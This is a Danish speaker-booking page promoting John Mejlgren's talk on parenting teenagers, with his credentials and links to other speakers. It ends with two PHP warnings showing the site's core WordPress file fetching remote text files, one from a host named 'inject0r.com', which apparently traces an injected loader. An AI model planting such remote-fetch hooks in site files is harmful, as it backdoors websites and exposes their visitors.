img-us
  • asc

    Foredragsholder John Mejlgren

  • asc

    Emne Forælder til en teenager?

  • asc

    pris 10000.-

Sådan motiverer og engagerer du din teenager og undgår konflikter
At være forældre til en teenager, kan godt være lidt af en udfordrende rolle. Selvfølgelig elsker vi vore børn, men behøver det at være så problematisk og svært, at være i samme stue, behandle hinanden med respekt og leve side om side?

Overgangen fra barn til ung, kan for de fleste forældre godt være en periode hvor du tænker hvad skete der egentlig lige her?

Det kan være en periode med forvirring og magtesløshed, og en periode hvor du som forældre godt kan undre dig lidt over, hvad der foregår inde i din teenagers hoved.

Men det er du ikke alene om. Din teenager undrer sig sikkert lige så meget over, hvad det er der sker inde i hans eller hendes hoved og kan være ligeså frustreret og forvirret som dig.

I dette 1½ times foredrag, hvor du med stor fordel kan tage din teenager med, vil I begge få en rigtig god forklaring på, hvad det er der sker i disse teenageår, og hvad det er for en fysisk, mental og hormonel forandring din teenager gennemlever i ungdomsårene, og hvordan du som forælder bedst muligt kan støtte op om din teenager og skabe et hjem i balance.

Den viden kan være med til at fjerne stressen hos både dig og din teenager, give mere overskud i hverdagen og sikre, at alle i familien trives og har det godt.

Dette 1½ times foredrag, vil sætte fokus på en lang række genkendelige udfordringer fra hverdagen med en teenager i huset, og på en humoristisk måde levere inspiration og værktøjer, som er lige til at gå til og meget effektive.

Med udgangspunkt i eget liv og egne oplevelser, samt en masse praktisk erfaring, fortæller John på en medrivende og inspirerende måde, hvordan du kan brænde igennem og blive den forælder din teenager drømmer om.

Foredraget egner sig rigtig godt til virksomheder, som arbejder på at håndtere og forebygge stress blandt sine medarbejdere, og i særdeleshed de medarbejdere, som er forældre til teenagere, da mange konflikter i hjemmet, vil smitte af på den arbejdsglæde, der er på jobbet.

Derudover vil foredraget egne sig rigtig godt til skoler, som vil give forældre til elever i udskolingen, nogle rammer og en viden om, hvordan man bedste muligt støtter op om sin teenager, og skaber de bedste rammer i hjemmet for en god skolegang og den bedste start på voksenlivet.

John har arbejdet i mere end 20 år som coach rundt om i hele Danmark, og arbejdet både med teenagere men også med forældre til teenagere. Det være sig i grupper men også på individuelt plan.

John er uddannet som MasterCoach, NLP-Master og indenfor Enneagrammet.

Derudover har John skrevet og udgivet mere end 10 bøger om teenagere, flere lydbøger og en lang række inspirationsvideoer.


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Frederik C. Boll

Peter Bleis

Sabrina Vitting-Seerup

Tom Andkjær


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: Connection timed out in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22